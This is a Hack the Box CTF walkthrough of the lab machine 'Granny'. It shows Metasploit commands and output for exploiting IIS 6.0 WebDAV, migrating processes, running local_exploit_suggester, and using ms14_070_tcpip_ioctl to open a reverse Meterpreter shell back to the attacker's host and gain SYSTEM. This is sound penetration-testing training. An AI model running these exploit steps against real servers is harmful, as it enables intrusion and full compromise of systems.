Hack the Box – Granny Walkthrough

Today we’re going to solve another CTF machine “Granny”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Windows
  • Services: HTTP
  • IP Address: 10.10.10.15
  • Difficulty: Easy

Weakness

  • Microsoft IIS version 6.0
  • ms15_051_client_copy_image​

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address. After doing intense scan on TCP/UDP ports we found nothing just single TCP 80 Port opened. And it states it’s IIS httpd 6.0

After doing some research we found an remote code execution vulnerability.

https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp

Exploitation

Since we have found our vulnerability let’s try to exploit it.

exploit/windows/iis/iis_webdav_upload_asp

After executing the exploit we instantly got the shell.

Privilege Escalation

Since we got user access, now we’re going after NT Authority that’s why we can’t run getuid. So we have to background our shell and use post/windows/manage/migrate module.

So here we see that this module will spawn a notepad.exe process and migrate our shell to run within that process. All we need to give is the name of our shell’s session which we set to the background earlier.

msf exploit(iis_webdav_upload_asp) > use post/windows/manage/migrate 
msf post(migrate) > show options

Module options (post/windows/manage/migrate):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   KILL     false            no        Kill original process for the session.
   NAME                      no        Name of process to migrate to.
   PID                       no        PID of process to migrate to.
   SESSION                   yes       The session to run this module on.
   SPAWN    true             no        Spawn process to migrate to. If name for process not given notepad.exe is used.

msf post(migrate) > set SESSION 1
SESSION => 1
msf post(migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (2624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 228
[+] Successfully migrated to process 228
[*] Post module execution completed
msf post(migrate) > 

It worked anyway!

msf post(migrate) > set SESSION 1
SESSION => 1
msf post(migrate) > run

[*] Running module against GRANNY
[*] Current server process: svchost.exe (2624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 228
[+] Successfully migrated to process 228
[*] Post module execution completed
msf post(migrate) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : GRANNY
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 

At this point it is a good idea to migrate to a process running under NT AUTHORITY\NETWORK SERVICE​. In this case davcdata.exe ​seemed to be the only stable process available. The intended exploit in this case is ms15_051_client_copy_image​, which immediately grants a root shell.

meterpreter > background
[*] Backgrounding session 1...
msf post(migrate) > use post/multi/recon/local_exploit_suggester 
msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(local_exploit_suggester) > 

After running this module we started to get some suggestions that this machine is vulnerable to this vulnerability.

msf post(local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 38 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So, now we have to test every exploit to see which actually works.

I found this one useful.

msf post(migrate) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (179267 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.4:4444 -> 10.10.10.15:1734) at 2018-11-28 23:38:41 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

 

Back to top button
Close